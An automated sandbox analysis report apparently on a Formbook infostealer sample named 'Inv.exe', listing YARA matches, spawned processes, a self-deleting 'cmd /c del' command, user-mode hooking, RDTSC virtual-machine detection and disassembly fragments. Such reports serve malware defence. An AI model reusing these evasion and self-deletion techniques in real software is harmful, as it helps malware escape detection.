          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@7/3
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO
          Source: Inv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Inv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Inv.exeVirustotal: Detection: 39%
          Source: Inv.exeReversingLabs: Detection: 45%
          Source: C:\Users\user\Desktop\Inv.exeFile read: C:\Users\user\Desktop\Inv.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Inv.exeProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: Inv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012391A5 push ecx; ret
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D1EF push ebp; ret
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0040F345 push edi; retf
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041E7C6 push edx; ret
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012391A5 push ecx; ret
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0199D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D085 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D0DB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D13C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D1EF push ebp; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036DA9F push cs; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0035F345 push edi; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036E7C6 push edx; ret

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Inv.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 6700Thread sleep count: 65 > 30
          Source: C:\Windows\explorer.exe TID: 6700Thread sleep time: -130000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576Thread sleep count: 43 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576Thread sleep time: -86000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.686106576.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1056063670.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.690969786.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Inv.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Inv.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01236A00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073E912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073F1BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073F181 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073F221 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073F369 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01236A00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01960050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01960050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A02073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A11074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A15BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01951B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01951B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01973B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01973B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]
